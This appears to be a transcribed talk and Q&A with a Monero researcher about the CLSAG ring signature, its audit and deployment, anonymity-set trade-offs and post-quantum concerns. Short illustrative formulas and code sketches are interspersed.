spend multiple inputs (most transactions spend between one and two inputs and generate some other outputs) need a separate signature for every spent input. So it turns out that for the most common forms of transactions, like a two-input, two-output transaction, you end up seeing overall about a 25% decrease in the transaction size and probably about a 10% speedup in overall transaction verification. So that's pretty good; there are really no downsides to this. Of course, we want to make sure that the security model for this is very strong. The security model basically just says: what properties do we want this construction to have? For our particular purposes, we want properties involving unforgeability and non-slanderability and linkability; there's a list of them that we want this linkable ring signature construction to have. What you do is build a hypothetical model of an imaginary attacker, and you give this attacker different powers. So you might give this imaginary attacker the power to convince honest users to hand over their private keys, or the power to persuade honest users to build arbitrary transactions on the attacker's behalf. And then you show that even if the attacker had these powers, it still can't generally break the properties we want to have without also breaking some computational problem, like the discrete logarithm problem, that we assume is computationally infeasible. So you basically say, hey, this hypothetical attacker can't exist; therefore, we're okay.
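Backing up to the aggregation and size claims a moment ago, here is a rough sketch of the shape of the idea, hedged as an illustration rather than a specification: the exact hash inputs and domain separation follow the CLSAG preprint and are omitted here. For a ring of public keys $P_1, \dots, P_n$ with commitment offsets $C_1, \dots, C_n$, CLSAG verification works against aggregate keys of the form
$$W_i = \mu_P P_i + \mu_C C_i,$$
where the scalars $\mu_P$ and $\mu_C$ are hashes over the ring, the key images, and domain-separation tags, so a signer cannot choose them adversarially. The size figure also follows from simple counting: an MLSAG over a ring of size $n$ (with the commitment layer) carries roughly $2n + 2$ thirty-two-byte elements, while CLSAG carries roughly $n + 3$; at the then-current ring size of 11 that is about 24 versus 14 elements, which is where "about half the size" for the signature component comes from.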
And so we decided to kind of beef up the security model that was used for CL sag, compared to like L sag and ML sag. And in doing so, ended up with, I would say like a pretty good model for how we want to work. That's pretty good. We're pretty sure that the same security model equally applies ML sag. But, you know, we didn't go back and kind of retroactively do that. This can seem to be pretty straightforward. Do you know if anyone else that is actually using ML sag in a sort of production like Monero is like is there any other application that's widely used for this. Oh, I mean, besides like projects that, you know, use, use it for the same purpose. You know, code forks or, you know, you know, different digital assets that have at least like the same or a similar protocol, presumably use it, but I'm not aware of any other direct applications. So originally, I'll say one of the original paper that originally introduced l sag, you know, one option that was listed was like a voting schemes, for example, where you want to be able to ensure that someone can't vote twice for a particular issue. But also as a man to you among the set of possible voters. I don't think that that's actually been implemented yet and you see your voting is really hard for all the reasons. But it happens to be really good for the purposes that we use for. And so, I guess got to finish up to the Monero Community commissioned and external audit of both the paper, the should be very careful and say preprint. This, this preprint is still technically a preprint so that means it hasn't undergone any other peer review aside from what I'm going to talk about. But we decided to have the preprint externally audited as well as the implementation for the upcoming October network upgrade audited. So that was done. There were two auditors who were commissioned to do that. And that was in kind of in consultation with the open source technology improvement fund, which is a nonprofit that does support for these kind of things. And supported by Monero Community donations. And the auditors had a lot of really good suggestions for how to improve the overall CLCeg security model and preprint. So I ended up changing a few of the proofs around and generally just improving how the security model improves were structured and run. And those didn't actually require any other changes to the scheme itself. So the construction itself and therefore the code didn't change as a result of that. But we're now much more confident in the way that the security model was arranged, some of the definitions, the cryptographic hardness assumptions and things like that. So that's great. Most changes have been made and that's now up on the ICR eprint archive. And then the implementation surprisingly didn't require any real changes for security, which usually you get some in there. They did it. There were a few kind of informational ideas for how to simplify the code. But, you know, we considered that changing those that would have been fairly extensive and how we handle certain key structures and such. And it was thought that it was probably more likely to introduce risk if we made kind of these big sweeping, more informational changes than if we were to just leave it. So, yeah, so the reports available. There's a blog post up on getmonero.org about it. You can read the full reports, take a look at the preprint, look at the code if that's your thing. Yeah, so it's scheduled to be deployed in the October network upgrade. 
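For readers who want the shape of one of the property games mentioned above, here is a paraphrase rather than the preprint's exact definitions: unforgeability, for example, can be modeled by giving an adversary $\mathcal{A}$ a set of honest public keys, a corruption oracle that reveals private keys of $\mathcal{A}$'s choice, and a signing oracle that produces signatures on messages and rings of $\mathcal{A}$'s choice. $\mathcal{A}$ wins if it outputs a valid signature on a ring of uncorrupted keys that the signing oracle never produced. The proof then argues
$$\Pr[\mathcal{A}\ \text{wins}] \le \mathrm{Adv}^{\mathrm{DL}} + \mathrm{negl}(\lambda),$$
that is, any adversary that wins with non-negligible probability could be turned into a solver for the discrete logarithm problem, which is assumed infeasible.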
So all you need to do is just keep your software updated. If you use hardware wallets like the Trezor and Ledger, that's in process as well; their firmware and apps are being updated to make sure everything is good to go on day one when we're ready. So if you use those, make sure you get the firmware updated too, and you're good to go. Very cool. We had a question come in from a viewer asking whether there are any plans to move past ring signatures in the future to something that isn't just hidden among other decoys, but has additional protections beyond decoy-level protection. So I guess there are quite a few things involved in this question. One is that we have the current decoy selection, which per transaction uses a relatively small number of decoys, and that provides reasonable mass-surveillance protection but less so against targeted surveillance if someone knows information about particular transactions. So given the current situation, what is the approximate timeline forward? Not necessarily the timeline, but the set of potential improvements, for whether or not ring signatures are the right approach for the future, and how you've approached dealing with the core problem of the relatively small per-transaction decoy counts. Yeah, so really the question seems to be about per-transaction anonymity sets. I increasingly dislike the idea of using the term ring signature to purely mean a limited anonymity set, just because, while it has been the case so far that our ring signature construction does have a limited anonymity set, I don't think it's necessarily the correct term to use. It's possible to build transaction protocols with limited anonymity sets or full anonymity sets; you can probably do all sorts of other things. I mean, we know there are transaction protocols that have no anonymity sets, but those are typically not the ones we're interested in. So what we do right now is use a linkable ring signature as a building block in a limited-anonymity-set transaction protocol for the Monero protocol. That's not the only way to do it, though. It's possible to build limited-anonymity-set transaction protocols that use, for example, specialized zero-knowledge proving systems. I really don't like the whole idea of "zero knowledge" meaning full anonymity and "ring signature" meaning not; that tends to describe certain implementations today, but it is not generally true. Those terms have much more technical meanings involving proof and signature constructions than the way we use them today. So it's possible to migrate over to a construction that still has a limited anonymity set, but one that permits much larger anonymity sets for reasonable transaction sizes and times, in a way that ideally would help against certain other forms of analysis or attack. Right now, the transaction protocol signatures scale linearly with the size of the anonymity set, so you're really kind of stuck there. There have been some proposals for ways to use different kinds of specialized zero-knowledge proving systems. Some examples are Omniring, RingCT 3.0, Triptych, Arcturus. There are probably other ones that I'm just not thinking of right now.
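To make the scaling contrast concrete, here is illustrative arithmetic only, not the exact figures of any one construction: if the per-input signature grows linearly in the ring size, moving from the then-current ring size of 11 to, say, 256 multiplies that component by roughly $256/11 \approx 23\times$. A proof whose size grows logarithmically instead grows by only a constant handful of elements per doubling, roughly $\log_2 256 - \log_2 11 \approx 4.5$ doublings' worth. That is why these proving-system-based proposals can offer much larger anonymity sets at reasonable sizes, while verification cost remains the harder problem, as discussed next.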
But all of these essentially allow a transaction proof, along with possibly some other auxiliary proofs, that scales much better in terms of size and a little bit better in terms of time. Verification time is unfortunately the sticking point here. If you want a trust-free proving system and transaction protocol, meaning one without a centralized trusted setup, you can make those proofs very small. We know how to do that already. They're not as small as, for example, the transaction proofs in, say, Zcash, but they're still quite small for the size of the limited anonymity set you can get. But verification time is always a sticking point. With those particular kinds of protocols and proofs, you still need an almost linear verification time, and that ends up being the sticking point. So that's the limitation that exists. There are options; they've all got some trade-offs in terms of what you can do with things like tracing and how the construction works. Some involve changes to multisignature operations, some involve changes to the way linking tags work, which would require almost a sort of pool migration that can still be done safely. Which one of these, if any, should be the one going forward is kind of up in the air right now. A lot of it depends on what trade-offs people are willing to accept, mainly in terms of transaction verification times. Obviously we'd like verification to be as fast as possible, because that means faster operations, but that has to be balanced against what kinds of analysis and attacks you want to be able to protect against. Ideally, what we'd love to do is move to something that is a full anonymity set. An example of that right now is something like the Zcash protocols, where the anonymity sets involved are basically enforced using proofs that do things involving Merkle tree proofs, and what that effectively gives you is a full anonymity set within that pool, absent external information. That would be ideal. But right now, all the proposals on the table for doing that suffer a lot in terms of either centralized trust, or proof size, or time. Right now you can't really have everything if you don't want centralized trust. And of course there are also other issues with that. For example, in many of the protocols... yeah, I think that's probably one for the next speakers, I assume. But anyway, right now that's the limitation. So under the assumption that the project and its community are unlikely to move to something that would require centralized trust, right now there has to be a limited anonymity set, and so there are still questions about how you end up choosing those anonymity sets. There are definitely ways you can do it that I think provide improvements over the way we do it now, as you get bigger anonymity sets. You can do certain kinds of binning with the outputs in those anonymity sets, and that can mitigate certain kinds of heuristics involving common ownership and the source of where those outputs came from in terms of transactions earlier on the chain, as well as timing analysis.
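The binning idea can be made concrete with a small sketch. This is a hypothetical illustration only: the bin width, bin count, ring size, and uniform sampling below are placeholder choices, not Monero's actual decoy-selection algorithm, which samples decoys from an age distribution fitted to observed spend behavior.

    import random

    def select_ring_with_bins(real_index, chain_height, ring_size=16, num_bins=4, bin_width=100):
        """Hypothetical binned decoy selection.

        Ring members are grouped into a few height 'bins' so that each ring member
        shares coarse on-chain timing with several others, which blunts heuristics
        based on common ownership or output age. All parameters are illustrative.
        """
        members_per_bin = ring_size // num_bins
        # One bin is anchored on the real spend so it hides among similar-age decoys;
        # the remaining bins are anchored at random heights.
        anchors = [real_index] + [random.randint(0, chain_height) for _ in range(num_bins - 1)]
        ring = {real_index}
        for anchor in anchors:
            lo = max(0, anchor - bin_width // 2)
            hi = min(chain_height, anchor + bin_width // 2)
            while sum(lo <= m <= hi for m in ring) < members_per_bin:
                ring.add(random.randint(lo, hi))
        return sorted(ring)

    if __name__ == "__main__":
        # Pretend output index 1,500,000 is the real spend on a chain with 2,000,000 outputs.
        print(select_ring_with_bins(real_index=1_500_000, chain_height=2_000_000))

The open design question referred to above is how to pick the bin anchors and widths so that the real spend's bin is statistically indistinguishable from the decoy bins.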
So there's a lot of interesting stuff you can play with but I don't think there's a really good understanding right now of what exactly those precise trade-offs people are willing to make are. Yeah, I hope that is. In my experience, honestly, we have code that can do this now but I think it's a matter of kind of the community and researchers and developers kind of getting into agreement on what those trade-offs should be. So, and again, hopefully, eventually we get to something that is efficient and trust-free, which would kind of check all the boxes for everyone. If from there you could very likely build a protocol that uses such a system and does in fact give you effectively, you know, fall-animity, which presumably would be enforced. In my experience, when people talk about full anonymity or limited anonymity, it's sort of in an academic only way and then it's applied to like, you know, it's typically the way things are currently, right? So limited anonymity looks like a Monero's case, right? And that in many cases, people think that that just can't even really change. They don't really think about these limited is just anything worse than the full pool. And that could be a larger number than the entire size of the pool of a different network, theoretically. And then people are just like... Yeah, and it also depends on what exactly the threat model is, right? Are you concerned about knowing various after making a bunch of controlled purchases and then examining the possible transaction tree between you and like, and I don't know, in exchange with whom this person or entity is colluding? So, you know, given that, you know, it's very difficult to get, I would say, like practical anonymity, you know, in that particular circumstance. And there's plenty of other circumstances that you can dream up where under certain threat models, limited anonymity just won't work for you. So it's one of those like, it's one of those infuriating, it depends kind of ends, where it's like limited anonymity right now is a trade-off. It is like an absolute trade-off. And we all look forward to the day when we can do something that's trustworthy. And, you know, frankly, like if your particular threat model is going to require, you know, a more full-en anonymity scenario, you know, then you might have to consider whether or not going to like a trusted setup sort of scenario is something that you need to do. That may come with, it's other trade-offs, you know, based on things like ecosystem availability and, you know, a host of other questions. But it's absolutely a trade-off, you know, and I think it's important to acknowledge that, you know, we have things like the Breaking Manera series where we kind of try to tease out some of the particular scenarios under which limited anonymity can be a problem. And those for which it might not be as much of a problem. But, and it's, I feel like, you know, it's not fun to like sit down and try to enumerate and think about the specifics of our risk model, but, you know, it's something that I fortunately, right now, I'm kind of have to do. We haven't had a Breaking Manera series in a while. So I guess, given that we haven't, what are, what episode ideas do you, would you like to see there be episodes for? Oh man, I think it'd be interesting to do one that talks about, I guess, some more specifics on things like churn and self-send operations. 
So I would say things like that. Something involving output merging would be very interesting, where outputs from different transactions end up being pulled into different anonymity sets in the same later transaction, and looking at ways to possibly mitigate that. Larger anonymity sets with good output selection can mitigate that example. The churn example is a bit tougher, because you could look at things like possible chain history sizes and distributions and what happens with that. There are a lot of interesting things to talk about, but I think it's important to do them in a way that doesn't rapidly devolve into confusing graphs and irritating math. But at the very least, I'm really happy to see that there is a lot of interesting research into this area: a lot of folks who want general zero-knowledge proving systems that are trust-free and efficient, and that would, I think, be the ideal checking of all the boxes. And it's interesting to see what different projects do, right? Things like Zcash and related projects get efficient proofs that are very fast to verify, and in theory you can do things like effectively full-anonymity-set transaction protocols, ideally; Zcash has its whole optionality aspect to it. But they're willing to sacrifice trust to a degree, to a multi-party computation. And there's always the question, for your personal use case and how you tend to view multi-party computation: do you think that a multi-party computation setup diffuses the trust out enough that you're okay with it, or are you not okay with it? Because in theory that does provide a guaranteed "this is how the soundness of this operation could fail" scenario, if a multi-party computation were misused, for example. So many questions in this space, and so many trade-offs. A lot of cryptography is basically just the precise study of mathematical trade-offs. But no, I don't really have a good timeline for when you might be able to move to something you'd consider full anonymity. There are options for increasing the anonymity set, though, which lets you do a lot of other cool things and hopefully mitigate some kinds of heuristics. It's not everything we'd want, but I think it would be an improvement. So is that on tap for October? Not for October. There are other interesting things on the horizon too. Ideas for making range proofs a little bit more efficient have come up. There was a preprint that came out on an improvement to Bulletproofs, called Bulletproofs+. The plus actually means taking away a few proof elements, but "Bulletproofs minus" doesn't sound as good. There was a proposal to do an implementation of that. It's really new; it's an extension of the way the Bulletproofs inner-product protocol works, with a cool weighting operation in it, and it would let us shave a few dozen bytes off of transactions. In theory, they'd be very marginally faster to verify too, but in practice it would pretty much be a wash, I think, in the grand scheme of things.
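Rough size arithmetic for that comparison, hedged because these are back-of-the-envelope figures from the preprints rather than Monero's exact serialization: a Bulletproofs range proof aggregating $m$ 64-bit ranges contains about $2\lceil\log_2(64m)\rceil + 4$ group elements plus 5 scalars, so a single-output proof over a 32-byte group comes to roughly $(16 + 5)\times 32 \approx 672$ bytes. Bulletproofs+ drops a few of those elements, landing somewhere near $\sim 576$ bytes for the same case, which is the "few dozen bytes" per proof referred to above and why the practical effect is real but modest.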
So really the question about whether or not it is worth moving to that is worth the effort. And the possible risk of something that's a bit newer has yet to be determined entirely. Were there any other questions that came up besides the one that got us into a very long discussion about protocols? Yeah, there's one. It's still protocol related question. So it is going to be a follow up, though. It says, so the ideal solution for Monero would be ZK Snarks like thing that doesn't require a trusted setup. And I believe you basically said yes, but also it needs to be efficient. Yeah, yeah, yeah. And specifically saying like ZK Snarks specifically, you know, it's, there are different ways to, there are different building blocks you can use to construct protocols. And I think it's important to consider it at a protocol level. So for example, like you could basically build something akin to, you know, like the Zcash sapling protocol for example, but without using ZK Snark construction, you could do that with bulletproofs for example. I don't think it's actually been done, but I know that there were some estimates made to say, okay, you know, bulletproofs is a zero knowledge proofing system. The scaling is, you know, in terms of verification is not as good, just absolutely not. But what it lets you do is it lets you prove things about circuits in a trust free way. So that is trust free. And so in theory, you could take, you know, the circuit that's using Zcash sapling and some of the other constructions and you can build that in bulletproofs and you get rid of trust. And the size would still be pretty good. The estimates and the size of like, it'd be competitive. Not as quite as good, but still pretty competitive. But the verification would be, no, it wouldn't work. Estimates I saw are like still on the order of a second, which you're like, well a second, that's pretty fast. It's like, yeah, but then you got to do that like a million times. So you can like amortize that down with backshading stuff, but it seemed like it was not quite doable at this point. So I would say something that would let you do like the whole Merkel proof kind of thing that effectively lets you do a full anonymity set based protocol would be ideal if, you know, we could make it mandatory, which other projects have shown you can do that to ensure optimal privacy. But also I think ideally is making it trust free or at least if using the trust and the soundness out to the point where everyone is satisfied with it. And I think it's been the general view of, you know, a lot of folks who support the idea of Monero to just reduce that trust down to nothing. You know, whereas for other projects, they decided that they're okay with, you know, kind of delegating that soundness risk off to a large enough, you know, set of participants in a multi-party competition that they are safe, you know, secure enough that they're, I guess, okay with the security of, it's not really an upgrade to say that, but that is risky, you know, I mean, like the sprout multi-party computation that started Zcash, for example, did have a soundness problem. And there was a kind of a whole deal where they had to end up taking down the proof transcripts and helping that no one was able to figure out and abuse that. So like there's a real non-trivial risk involved, even to something like such a multi-party computation. So that's not without risk either. And it makes the trust situation a little bit more tricky. 
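To make concrete what "the whole Merkle proof kind of thing" mentioned above is actually proving, here is a plain, non-zero-knowledge Merkle membership check in Python. In Sapling-style protocols this same statement, "this leaf is in the tree with this root," is proven inside a circuit in zero knowledge so the leaf (the spent output) is never revealed; the sketch below only shows the underlying membership relation, with SHA-256 standing in for whatever hash the real protocol uses.

    import hashlib

    def h(data: bytes) -> bytes:
        return hashlib.sha256(data).digest()

    def merkle_root(leaves):
        level = [h(x) for x in leaves]
        while len(level) > 1:
            if len(level) % 2:
                level.append(level[-1])          # duplicate last node on odd levels
            level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
        return level[0]

    def merkle_path(leaves, index):
        """Sibling hashes needed to recompute the root from leaves[index]."""
        level = [h(x) for x in leaves]
        path = []
        while len(level) > 1:
            if len(level) % 2:
                level.append(level[-1])
            sibling = index ^ 1
            path.append((level[sibling], index % 2))  # (sibling hash, am I the right child?)
            level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
            index //= 2
        return path

    def verify_membership(leaf, path, root):
        node = h(leaf)
        for sibling, node_is_right in path:
            node = h(sibling + node) if node_is_right else h(node + sibling)
        return node == root

    if __name__ == "__main__":
        outputs = [f"output-{i}".encode() for i in range(8)]
        root = merkle_root(outputs)
        proof = merkle_path(outputs, 5)
        print(verify_membership(outputs[5], proof, root))  # True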
So I am personally of the opinion that I like the idea of minimizing the possible soundness problems. A soundness problem for something that involves a trusted setup is the trusted setup in the multi-party computation; and for anything that uses, for example, Pedersen commitments, which Monero does, other projects do too, Zcash does, Mimblewimble-based assets do, in theory, if you could break Pedersen commitments, that's a problem with something akin to soundness as well. So it's definitely a different threat profile, and ideally we want to minimize that. Got it. Something that was discussed quite a few years ago, but I don't think has really come up super recently, is the idea of second-layer networks on Monero. Like, what if you want to put the Lightning Network on Monero? What if you want to put this, that, or the other on Monero? What if you wanted to put a ZK-SNARK mixer on Monero as an optional thing? So I guess, what sort of building blocks need to happen to allow greater compatibility, knowing that right after this we also have a talk about atomic swaps for Monero too. Yeah, which is a really cool new thing. That's still in progress, but yeah. There are some other researchers who were looking at the possibility of what it would take to do atomic swaps between something like Monero and something like Bitcoin, for example, where in Bitcoin there's a lot of stuff you can do because Bitcoin has scripting capability, but also some different setups in how its protocol works and how it runs things like signatures and the like. And that gets really tricky, because Monero does not have inherent scripting capability. Adding inherent scripting capability would be pretty awful for fungibility, so I tend to view that as probably a non-starter on Monero's side. So given that, the question is: okay, what could you do for something like atomic swaps? One idea, which maybe will be talked about in the next talk, so we'll try not to give too much away, involved a particular zero-knowledge proof that was kind of unspecified at the time in the write-up. In theory, we could have done it with something like Bulletproofs, but it would have involved hash functions, and that gets messy to do in circuits, so that was not ideal. But then they came up with another idea that uses a clever cross-group proof, where you basically prove, across two different groups that are otherwise basically algebraically incompatible, equality of an unknown discrete log. And it turns out that if you can do this, you can very cleverly build it into a protocol involving some Monero transactions and some Bitcoin-style transactions in a way that could let you do atomic swaps. Pretty darn interesting. There are still some open, ongoing questions about how you need to structure those transactions to make sure that if one or more of the parties involved doesn't follow the protocol, you know what the risks to funds are, if any, and what the worst-case scenario is that could occur. And even then, saying: okay, suppose the protocol does work exactly as you'd expect and the swap does happen.
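The shape of the statement such a cross-group proof establishes, paraphrased from my reading of the swap write-ups rather than quoted from them: the prover shows knowledge of a single secret scalar $x$ such that
$$X_1 = x\,G_1 \ \text{(on Monero's ed25519 curve)} \qquad\text{and}\qquad X_2 = x\,G_2 \ \text{(on Bitcoin's secp256k1 curve)},$$
without revealing $x$. Because the two groups have different orders, the proof also has to constrain $x$ to a range valid in both, typically via a bit decomposition, which is where most of the machinery lives. Once both sides are convinced the same secret controls related outputs on both chains, the swap can be arranged so that whichever party claims funds on one chain necessarily reveals enough for the counterparty to claim on the other.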
You know, what information that they need is that leak across, you know, one or more of those chains. So, I mean, for example, if you use the centralized service to do swaps right now, like that can obviously have some risk because that entity knows presumably where assets came from and where they're sending them to. So, you know, it kind of is a central storage kind of risk. But also you can do different kinds of timing analysis and other amount analysis across different chains to try to determine, you know, what's going on and what funds are moving where. And if that's a risk for you, then you don't really want that. So, I think the question of what, if anything, about that kind of analysis would transfer from the current setup, which is like, you know, use the centralized service to do my exchanges versus saying, well, I'll just do it atomically without a central service. Like what kind of analysis could still happen? It's not nothing, because metadata always exists. But I think the question of to what extent does it happen? And, you know, is that something that you want to do? I think are still open, but very interesting nonetheless. There were some other ideas for stuff like payment channel networks, even within Monero. My DLSag was another signature construction that some other researchers came up with. And we looked at it and unfortunately had like this tracing problem that's whatever I'm looking for, tracing problem that's, would have required this whole self-spend thing. And it was, it kind of got messy and there wasn't really a great solution for it, unfortunately. So that kind of ended up being dead in the water for that purpose at least, which was really unfortunate. Because DLSag would have opened the door to some interesting stuff. Got it, got it. I know this isn't- I know there's LSAG names, just- Yeah. Eventually it was going to be everybody. Something involving an LSAG construction, just for even more confusion. So I know this isn't your work directly, but I know Ismus recently opened a community crowdfunding system proposal to look into potential, potential limitations in Monero related to quantum computing. He was going to look at the initial scope of what basically challenges Monero needed to address going forward. Can you speak a little bit about what, what this general work is doing? And then also speak about Monero and quantum computing generally. Yeah, so this is work that's ongoing. They believe we're going to work on three months. They're about to end up the first month, I think, of that. So again, I'm not directly working on this, so I don't want to try to speak to them or anything. But their idea was, okay, under the assumption that someday quantum computers would exist. And there's definitely debate on, like to what extent people think that this would be a problem in the future. If so, how far into the future? And if all of that, what actions would we want to take now in the protocol to try to mitigate the possible future effects of quantum computers? And they want to look at kind of different parts of the protocol, of range groups and range signatures and kind of a one-time addressing construction and all of this stuff. To what extent would different parts of the chain be considered at risk? The way the Monero keys work, there's a private key and a public key. And they're related by this algebraic group operation. 
And it's pretty well understood that the one-way map right now from private key to public key, where we assume that it's computationally infeasible to determine the signing key just if you see a key on chain, assume that that's very difficult right now and it's a one-way operation. It's pretty well understood that given a sufficiently advanced quantum computer, that map would be reversible efficiently. So at that point you could spend anyone's funds, which, I don't know, that's a problem. But to some extent, it's not necessarily just a problem for Monero. This is kind of a broadly applicable problem. The entire internet runs on these one-way maps right now to a large extent. So it's kind of one of those, well, your house is on fire, but the rest of the world's on fire too. Doesn't make your fire any less bad, but it does mean that there would be a lot of problems to worry about. But even beyond that, looking at things like, what would that allow you to do to ring signatures? So as one example, because of the way that the key images or linking tags work within the Monero protocol, it would allow you to look at different outputs that are part of a ring and determine which of them is the signer, because of the way that the keys work right now. They involve private keys, and you can basically do a kind of guess and check testing operation. So again, this is impossible today as far as we know, but under the assumption of a hypothetical quantum computer, you could figure that out. There are some other questions right now involving things like what could you determine about stealth or one-time addressing operations? And that's still, I think, a little bit ambiguous right now. One question that I have that I know is not unique to Monero is saying, well, okay, suppose that I have a transaction here. Could I just use that transaction to, for example, figure out what the wallet address of the recipient was? Because remember, in Monero, wallet addresses never appear directly on chain. They're used to derive these one-time addresses. So right now, I mean, without external information, you can't just use on-chain information to link those one-time addresses back to the wallet addresses. So the question might be, even with a quantum computer, could you take a transaction and determine its recipient wallet address, just kind of with no external information? Or if you, for example, had a candidate list of possible recipients that you think it might be, because maybe you have a hunch or some other external information, are there ways that you could go and basically check those to determine which it would be? And again, the address space in Monero, like the possible wallet address space in Monero, is unfathomably huge. And a quantum computer doesn't just mean it can do everything fast automatically. There are particular algorithms that we know can be used against things like the discrete log problem and stuff. So even if you had a hypothetical quantum computer, saying, well, it couldn't just go through all possible addresses and see which it is and figure out what recipient is linked to what transaction, that's likely not going to be directly possible. But the question is, what could such a computer do if it had a small known list of possible addresses? So questions like that, I think, are still kind of up in the air and are part of the subject of the research that they're working on.
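To make the guess-and-check idea above concrete, here is a toy sketch. It mimics the shape of Monero's key image (linking tag) check, but in a stand-in group with made-up numbers and a fake hash-to-point function, and it assumes the hypothetical adversary has already recovered every ring member's private key, which is exactly what a discrete-log-breaking quantum computer is posited to allow.

# Toy illustration of the "guess and check" idea, NOT the real Monero math.
# Real Monero uses Ed25519 points and a hash-to-point function Hp; here the
# group is faked with modular exponentiation just to show the shape of the check.
import hashlib

p = 2**127 - 1
g = 3

def hash_to_point(pub: int) -> int:
    # stand-in for Monero's Hp(P); not the real construction
    digest = hashlib.sha256(str(pub).encode()).digest()
    return pow(g, int.from_bytes(digest, "big") % (p - 1), p)

def key_image(priv: int, pub: int) -> int:
    # Monero-style linking tag I = x * Hp(P), written multiplicatively here
    return pow(hash_to_point(pub), priv, p)

# A ring of public keys; index 2 is the true signer.
ring_privs = [11, 22, 33, 44]                  # normally not known to an observer
ring_pubs = [pow(g, x, p) for x in ring_privs]
published_image = key_image(ring_privs[2], ring_pubs[2])

# An adversary who can recover each private key just recomputes candidate
# key images and compares them with the one published in the signature.
for i, (x, P) in enumerate(zip(ring_privs, ring_pubs)):
    if key_image(x, P) == published_image:
        print("ring member", i, "is the true signer")

Without the recovered private keys, the published key image reveals nothing about which ring member signed; the concern is that recovering those keys would turn historical linking tags into a signer oracle.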
And I do know that they're also looking at kind of what current directions in Monero protocol development to take that could more efficiently, I guess, work on trying to mitigate the effects of a future quantum computer. I guess one problem with a lot of algorithms and constructions that are conjectured to be post-quantum secure is efficiency. They often tend to be much more inefficient than I guess would be reasonable to have on chain. Right now, like, post-quantum signatures, for example, can get pretty large. And there have been some ideas for how to do some constructions like linkable ring signatures even, but they're very large. And even if you were to integrate them into the protocol, you still deal with today's computers that still have to store things and do a lot of processing. And if it gets to be too large of a transaction that's too slow, no one's going to use it. So, ideally, we'd like to migrate the protocol immediately to something that's conjectured to be post-quantum secure, but there are a lot of parts of the protocol where it's really uncertain if there's anything at this point that's efficient enough. I mean, research in this area is always ongoing. So obviously, what's the state of the art today is almost certainly not going to be even close to what the state of the art is in 10 years, 20 years, further down the line, where maybe we have a better understanding of the likelihood of seeing a practical quantum computer. So I think one thing that they're trying to do, and I don't want to speak for them, but just my understanding of the work that they're doing, is to look at what are at least some directions in research that might give us an indication about what could be efficient down the road for protocol improvements. I mean, I guess the general thing is, to some extent, in the age of practical quantum computers, a lot of the internet is kind of screwed in terms of security. So, I mean, Monero would be, at least to some degree, not immune to this; the extent to which different parts of the, I guess, previous chain's history could be known, I think the exact nature of that is what they're trying to determine now. It's really interesting work. But do you think that it's going to be applicable in your lifetime or the lifetime of people you care about? I think that's also very much kind of a contentious issue right now. I don't think that there's really universal agreement on when, if ever, folks might end up seeing a practical quantum computer that would affect projects that they use. And I'm not even close to enough of an expert in the area to be able to even hypothesize. Yeah, I got it. So, switching gears, what research have you seen outside of what you've specifically done for Monero, I would say, that has been not necessarily useful, but just really interesting and really surprising? I would say, I think just the extensive work that's been done on general zero-knowledge proving systems is really cool. So, I mean, right now we use very specific zero-knowledge proving systems in different projects for different purposes. I mean, Bulletproofs, for example, is a zero-knowledge proving system that does one particular thing involving Pedersen commitments really well. However, that's just one application.
There's kind of a variant form of Bulletproofs that you can use to take different algebraic statements, kind of massage them into this particular circuit format, and then build a proof over the circuit arrangement in order to prove that you know, I guess, a witness that ends up satisfying the circuit without revealing what that witness is. And that's kind of the general form of a general zero-knowledge proving system. And so if you have a protocol that you really want to implement, you can put it into this form and do this kind of representation, and then there are always different tools that you can use right now to prove things about statements relating to this language that you built. So bulletproofs can do that. The different proving systems that are used, you know, in stuff like the Zcash protocols can do that. There's a lot of stuff involving zk-STARKs. And, you know, there's a whole host of really interesting research on how to do this and what the different trade-offs are. And like I said before, I would say the holy grail for this is trust-free, small, and efficient to generate and verify proofs. And ideally also stuff involving things like batching that lets you kind of amortize the cost of verification over multiple proof verifications. Just the fact that there's so much fascinating work going on relating to this is really interesting. And unfortunately, none of it that I've seen, I think, applies directly to the Monero protocol based on what folks want from it right now. Right now the whole trust thing seems to be a pretty big sticking point. You know, like I said, for users who decide that, you know, they need a protocol that does more than what Monero can offer, you probably at this point are going to have to sacrifice that whole, you know, where does the trust lie question. But at the same time, the fact that the research is ongoing and has undergone so much improvement over a pretty short period of time, I think, speaks really highly to where that area of research is going to go in the future. So, I mean, I think it would be great to be able to move to a general idealized future zero-knowledge proving system, you know, that lets us build really cool protocols that give us everything we want. Something that's not here today; hopefully it's not too far off. There has been a lot of work in that area. It's been shocking. Yeah, and to be clear, I'm really glad that other projects are doing research in that and, you know, putting that kind of stuff into practice. As with all projects, including Monero, I think it's important to talk about limitations and trade-offs, and you couldn't just drop things like this into Monero today without breaking it, but it's still good that, you know, those different kinds of applications are also furthering more research. Sorry. I'm also helping some other later speakers come through. Okay, so you have another five minutes. There aren't any other questions that have come in, sadly, just the two from Andreas. So thank you, Andreas, for asking those questions. I really appreciate them. No one else came to the office hours. They're true office hours. No, that's okay. No, I mean, it's good to kind of just recap how stuff has gone and hypothesize where it might go. Research is interesting, you know, you never know what's going to come up, what's going to work, what's not going to work.
I think the upgrade in October is going to be exciting because, you know, Bulletproofs was, I think, a cool example of something where transactions got smaller and faster and there were really no big trade-offs that folks had to consider. And I think CLSAG is another example where, you know, the transactions get smaller, they go faster, not to the extent that Bulletproofs did, but there's not really any security trade-off. You know, if anything, working on CLSAG helped to kind of improve the way that we understand linkable ring signature security models. So if anything, I feel like there's more confidence now about the security of the setup that we're going to have. So if anything, it's not really a trade-off, it's just, you know, kind of an increasing stack of benefits. You're saying that it would be a little bit weird with whatever comes next, because with RingCT, for example, it was an absolutely necessary change in order to hide the amounts of transactions, and all the other benefits came with it. And I think the issues with denominated Monero were not, they still continue to not be well documented in, I think, a very clear way. We know they're bad, but also, I don't think we've had many research papers yet showing how bad they were. Oh, I mean, the early Monero chain is, you know, a fantastic source of material for analysis. You know, I mean, it's well understood that the effect of, you know, a lot of optionality in the protocol has always been problematic. You know, a huge number of early transactions, you know, were effectively, I would say, deanonymized in the sense of, like, ring-based signer ambiguity, you know, not, again, not based on wallet addresses or anything. And I think that that kind of still influences work that goes on today. There are still parts of the protocol that have some optionality in them. And, you know, you can argue that it's good to have some flexibility in the protocol to allow for alternative use cases that you might not anticipate, but at the same time, a lot of the work that especially folks like Isthmus and his group have done has shown that the optionality, you know, can lead to fingerprinting if you're not using standard software or you're using a service that does something in a strange way. And I think that a lot of folks are coming around to a better appreciation of the fact that limiting the protocol to, you know, improve uniformity and decrease fingerprinting is 